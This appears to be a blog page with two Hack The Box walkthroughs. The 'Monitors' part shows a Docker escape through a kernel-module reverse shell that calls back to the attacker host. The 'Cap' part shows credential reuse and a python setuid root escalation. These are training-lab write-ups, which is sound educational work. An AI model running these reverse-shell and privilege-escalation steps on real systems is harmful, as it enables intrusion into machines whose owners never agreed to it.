6:freezer:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
5:net_cls,net_prio:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
4:perf_event:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
3:rdma:/
2:memory:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
1:name=systemd:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
0::/system.slice/containerd.service

Let’s return to a shell:

meterpreter > shell
Process 203 created.
Channel 4 created.

We discover we are indeed root. The goal now is to get out of the docker compose environment:

id
uid=0(root) gid=0(root) groups=0(root)

Docker Escape

Hacktricks suggests looking for capability-related vulnerabilities:

capsh --print

Terminate channel 4? [y/N]  N                                                                                                                                               
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip                                                                                                                                         
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=

We see here that cap_sys_module can be exploited (cf. Hacktricks).

With a bit of research, I found this post: https://blog.nody.cc/posts/container-breakouts-part2/

So we create the two files shown in the post:

#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.5/4445 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };

// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

obj-m +=reverse-shell.o

all:
	make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) modules
clean:
	make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) clean

Then we download them onto the target:

┌──(kali㉿kali)-[~/Desktop/linpeas-server]
└─$ python2 -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

wget 10.10.14.5/reverse-shell.c
--2023-09-09 17:13:13--  http://10.10.14.5/reverse-shell.c
Connecting to 10.10.14.5:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 616 [text/plain]
Saving to: ‘reverse-shell.c’

     0K                                                       100% 50.2M=0s

2023-09-09 17:13:13 (50.2 MB/s) - ‘reverse-shell.c’ saved [616/616]

wget 10.10.14.5/Makefile
connected.
HTTP request sent, awaiting response... --2023-09-09 17:13:30--  http://10.10.14.5/Makefile
Connecting to 10.10.14.5:80... 200 OK
Length: 148 [application/octet-stream]
Saving to: ‘Makefile’

     0K                                                       100% 18.1M=0s

2023-09-09 17:13:30 (18.1 MB/s) - ‘Makefile’ saved [148/148]

After building the files with make, we run:

insmod reverse-shell.ko

Root

And there we go—we’re out of Docker and we’re root!

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4445
listening on [any] 4445 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.238] 38630
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell

We then retrieve the final flag:

root@monitors:/# cat /root/root.txt
cat /root/root.txt
db03..9500

[HTB - Easy] Cap

Fri, 08 Sep 2023 00:00:00 GMT

nmap

First, we'll scan the open ports of the IP:

┌─[eu-vip-23]─[10.10.14.5]─[htb-jsthope@htb-xbv1dyv8fx]─[~]
└──╼ [★]$ nmap 10.10.10.245
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-07 22:35 BST
Nmap scan report for 10.10.10.245
Host is up (0.18s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 8.69 seconds

http

On the site, we notice we're logged in by default as the user "Nathan". We then find that the site allows downloading network captures: http://10.10.10.245/data/0

We download pcap number 0 and analyze it with Wireshark:

We then find Nathan's password (used for FTP).

ssh

Nathan's FTP password is the same as his SSH password:

─[eu-vip-23]─[10.10.14.5]─[htb-jsthope@htb-xbv1dyv8fx]─[~]
└──╼ [★]$ ssh nathan@10.10.10.245

We then retrieve the user flag:

nathan@cap:~$ ls
user.txt
nathan@cap:~$ cat user.txt
ebd67..bc21c

privesc

We check for vulnerabilities related to capabilities:

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

We can immediately see here that python3.8 is likely vulnerable to a setuid-type exploit. You can find capability exploits on gfobins:

nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)

We are indeed root! All that remains is to retrieve the final flag:

# cat /root/root.txt
0987..b266c

jsthope

[Minecraft] Simple xray for lunar client

Goal

Bridge

Dump all classes

Find the net/minecraft/block/Block class

Edit Block class with Recaf

Implement the DLL native method logic

Bool Enable / Disable Logic

AllowBlock

Overwriting classes

Block Class

Insert our Bridge class

Reload Chunk

1. Reload Request Flag (g_needReload)

2. Render Thread Hook (glOrtho Detour)

How the hook is installed

3. Java-Based Chunk Reload (ReloadChunks())

Conclusion

Credit

Source Code

[GlacierCTF 2023 - Misc] Avatar

Introduction

First condition

Numbers

Letters

Second condition

Optimization

Payload

[HTB - Hard] Monitors

Marcus

Nmap

Hosts

Wordpress

Wordpress RFI

Cacti

www-data -> marcus

Root

linpeas.sh

Tunnel (Chisel)

ofbiz exploit

Searchsploit

Metasploit

Docker

Docker Escape

Root

[HTB - Easy] Cap

nmap

http

ssh

privesc

Find the `net/minecraft/block/Block` class

1. Reload Request Flag (`g_needReload`)

2. Render Thread Hook (`glOrtho` Detour)

3. Java-Based Chunk Reload (`ReloadChunks()`)